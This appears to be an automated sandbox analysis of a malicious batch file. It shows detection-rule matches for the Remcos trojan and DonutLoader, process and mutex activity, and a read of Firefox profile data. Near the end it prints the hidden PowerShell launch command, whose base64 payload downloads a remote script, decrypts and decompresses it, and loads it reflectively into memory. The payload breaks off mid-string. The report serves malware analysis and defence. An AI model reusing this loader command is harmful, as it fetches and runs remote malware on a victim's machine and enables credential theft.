                Source: 00000037.00000002.2798234763.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 0000003C.00000002.3020737620.0000000005DAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 0000003C.00000002.3350777711.0000000008C8C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000022.00000002.2153331440.000000000930C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0000003C.00000002.3354412418.000000000A3F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 00000031.00000002.2605482729.0000000005BAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 00000031.00000002.2795920672.0000000008B1C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000046.00000002.4173144196.000000000888C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000016.00000002.1822042034.0000000009DA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 00000022.00000002.2085983779.000000000656F000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 00000041.00000002.3295240918.000000000601B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 00000016.00000002.1790510884.0000000005560000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: Process Memory Space: powershell.exe PID: 7164, type: MEMORYSTR; Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 7164, type: MEMORYSTR; Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 6324, type: MEMORYSTR; Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 6324, type: MEMORYSTR; Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 6580, type: MEMORYSTR; Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 6580, type: MEMORYSTR; Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 5732, type: MEMORYSTR; Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 5732, type: MEMORYSTR; Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 5288, type: MEMORYSTR; Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 5288, type: MEMORYSTR; Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 4780, type: MEMORYSTR; Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 4780, type: MEMORYSTR; Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 6556, type: MEMORYSTR; Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 6556, type: MEMORYSTR; Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 2528, type: MEMORYSTR; Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 3808, type: MEMORYSTR; Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 3808, type: MEMORYSTR; Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 5472, type: MEMORYSTR; Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 5472, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 1808, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 10.2.powershell.exe.a339058.7.raw.unpack, ymdoz.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 10.2.powershell.exe.89f0000.3.raw.unpack, ymdoz.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 10.2.powershell.exe.5cdeb28.1.raw.unpack, ymdoz.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 10.2.powershell.exe.5edd388.2.raw.unpack, ymdoz.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 10.2.powershell.exe.a339058.7.raw.unpack, ymdoz.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 10.2.powershell.exe.a339058.7.raw.unpack, ymdoz.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 10.2.powershell.exe.89f0000.3.raw.unpack, ymdoz.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 10.2.powershell.exe.89f0000.3.raw.unpack, ymdoz.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 10.2.powershell.exe.5edd388.2.raw.unpack, ymdoz.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 10.2.powershell.exe.5edd388.2.raw.unpack, ymdoz.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 10.2.powershell.exe.5cdeb28.1.raw.unpack, ymdoz.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 10.2.powershell.exe.5cdeb28.1.raw.unpack, ymdoz.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winBAT@121/98@10/3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free | 13_2_004182CE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free | 13_2_00418758
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle | 13_2_00413D4C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_004148B6 FindResourceW,SizeofResource,LoadResource,LockResource | 13_2_004148B6
Source: C:\Windows\System32\cmd.exe | File created: C:\Users\user\dwm.bat
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4992:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2456:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2524:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4460:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6492:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7164:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6388:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4248:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:800:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1796:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1548:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:524:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1604:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6236:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5332:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6580:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5436:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4888:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6616:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5696:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5396:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5856:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3324:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6092:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1012:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6300:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3980:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4448:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5952:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6900:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4352:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zqrn3wwh.1eg.ps1
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\5kldoushde.bat" "
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | System information queried: HandleInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: powershell.exe, powershell.exe, 0000000D.00000002.1698027984.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: powershell.exe, powershell.exe, 0000000F.00000002.1692346355.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: powershell.exe, 0000000D.00000002.1698027984.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: powershell.exe, powershell.exe, 0000000D.00000002.1698027984.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: powershell.exe, powershell.exe, 0000000D.00000002.1698027984.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: powershell.exe, powershell.exe, 0000000D.00000002.1698027984.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: powershell.exe, 0000000D.00000002.1699267968.00000000030C0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: powershell.exe, powershell.exe, 0000000D.00000002.1698027984.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Evasive API call chain: __getmainargs,DecisionNodes,exit | graph_15-33223
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\5kldoushde.bat" "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\5kldoushde.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDb
i5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3